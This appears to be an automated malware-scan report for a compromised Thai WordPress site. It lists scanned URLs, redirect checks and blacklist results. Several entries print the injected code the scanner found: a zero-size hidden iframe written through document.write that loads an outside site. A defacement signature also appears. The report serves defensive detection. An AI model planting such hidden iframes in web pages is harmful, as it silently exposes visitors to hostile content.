Scanned pages/files
Request | Server response | Status |
http://www.khaofang.net/ | 200 OK Content-Length: 29993 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!-- document.write(unescape("<iframe frameborder="0" height="0" src="http: width="0"></iframe> <a href="http://www.devilscafe.in" target="_blank"><img src="" />")); //--> Antivirus reports:
Hidden iFrame found. The same iFrame was found in 25 websites. size: 0x0 src: http://www.devilscafe.in <iframe frameborder="0" height="0" src="http://www.devilscafe.in"
width="0"> Deface/Content modification. The following signature was found: Hacked By MEHR@N BBC ...[26801 bytes skipped]... ;li><h2>à¸à¸¹à¹à¸¡à¸²à¹à¸¢à¸µà¹à¸¢à¸¡</h2> <ul> <script src="http://pub.mybloglog.com/comm3.php?mblID=2009052707470487&r=widget&is=small&o=l&ro=4&cs=black&ww=240&wc=single&l=n"></script> <html><head><meta http-equiv="content-type" content="text/html; charset=windows-1252"><title>Hacked By MEHR@N BBC </title> </head><body bgcolor="black"><p></p><style>BODY {PADDING-RIGHT: 5px; PADDING-LEFT: 5px; SCROLLBAR-FACE-COLOR: #000000; BACKGROUND: #000000; PADDING-BOTTOM: 5px; MARGIN: 0px; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #00c000; SCROLLBAR-3DLIGHT-COLOR: #00c000; SCROLLBAR-ARROW-COLOR: #00c000; PAD ...[7578 bytes skipped]... | ||
http://www.khaofang.net/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://www.khaofang.net/wp-includes/js/prototype.js?ver=1.6.1 | 200 OK Content-Length: 139854 Content-Type: application/javascript | clean |
http://www.khaofang.net/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 78620 Content-Type: application/javascript | clean |
http://www.khaofang.net/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1 | 200 OK Content-Length: 927 Content-Type: application/javascript | clean |
http://www.khaofang.net/index.php?ak_action=wp_grins_js | 200 OK Content-Length: 4582 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 22456 Content-Type: text/javascript | clean |
http://www.google.co.th/coop/cse/brand?form=cse-search-box&lang=th | 200 OK Content-Length: 2516 Content-Type: text/javascript | clean |
http://pub.mybloglog.com/comm3.php?mblID=2009052707470487&r=widget&is=small&o=l&ro=4&cs=black&ww=240&wc=single&l=n | 500 Can't connect to pub.mybloglog.com:80 (Bad hostname) Content-Length: 166 Content-Type: text/plain | clean |
http://pub.mybloglog.com/test404page.js | 500 Can't connect to pub.mybloglog.com:80 (Bad hostname) Content-Length: 166 Content-Type: text/plain | clean |
http://www.khaofang.net/Hacked%20By%20Iran%20Security%20Team_files/ga.js | 404 Not Found Content-Length: 16006 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- document.write(unescape("<iframe frameborder="0" height="0" src="http: width="0"></iframe> <a href="http://www.devilscafe.in" target="_blank"><img src="" />")); //--> Antivirus reports:
Hidden iFrame found. The same iFrame was found in 25 websites. size: 0x0 src: http://www.devilscafe.in <iframe frameborder="0" height="0" src="http://www.devilscafe.in"
width="0"> | ||
http://www.khaofang.net/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/ga.js | 404 Not Found Content-Length: 16049 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- document.write(unescape("<iframe frameborder="0" height="0" src="http: width="0"></iframe> <a href="http://www.devilscafe.in" target="_blank"><img src="" />")); //--> Antivirus reports:
Hidden iFrame found. The same iFrame was found in 25 websites. size: 0x0 src: http://www.devilscafe.in <iframe frameborder="0" height="0" src="http://www.devilscafe.in"
width="0"> | ||
http://www.khaofang.net/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/ga.js | 404 Not Found Content-Length: 16092 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- document.write(unescape("<iframe frameborder="0" height="0" src="http: width="0"></iframe> <a href="http://www.devilscafe.in" target="_blank"><img src="" />")); //--> Antivirus reports:
Hidden iFrame found. The same iFrame was found in 25 websites. size: 0x0 src: http://www.devilscafe.in <iframe frameborder="0" height="0" src="http://www.devilscafe.in"
width="0"> | ||
http://www.khaofang.net/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/ga.js | 404 Not Found Content-Length: 16135 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- document.write(unescape("<iframe frameborder="0" height="0" src="http: width="0"></iframe> <a href="http://www.devilscafe.in" target="_blank"><img src="" />")); //--> Antivirus reports:
Hidden iFrame found. The same iFrame was found in 25 websites. size: 0x0 src: http://www.devilscafe.in <iframe frameborder="0" height="0" src="http://www.devilscafe.in"
width="0"> | ||
http://www.khaofang.net/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/Hacked%20By%20Iran%20Security%20Team_files/ga.js | 404 Not Found Content-Length: 16178 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- document.write(unescape("<iframe frameborder="0" height="0" src="http: width="0"></iframe> <a href="http://www.devilscafe.in" target="_blank"><img src="" />")); //--> Antivirus reports:
Hidden iFrame found. The same iFrame was found in 25 websites. size: 0x0 src: http://www.devilscafe.in <iframe frameborder="0" height="0" src="http://www.devilscafe.in"
width="0"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: khaofang.net
Result:
GET / HTTP/1.1
Host: khaofang.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: khaofang.net
Referer: http://www.google.com/search?q=khaofang.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: khaofang.net
Referer: http://www.google.com/search?q=khaofang.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=khaofang.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://khaofang.net/
Result: khaofang.net is not infected or malware details are not published yet.
Result: khaofang.net is not infected or malware details are not published yet.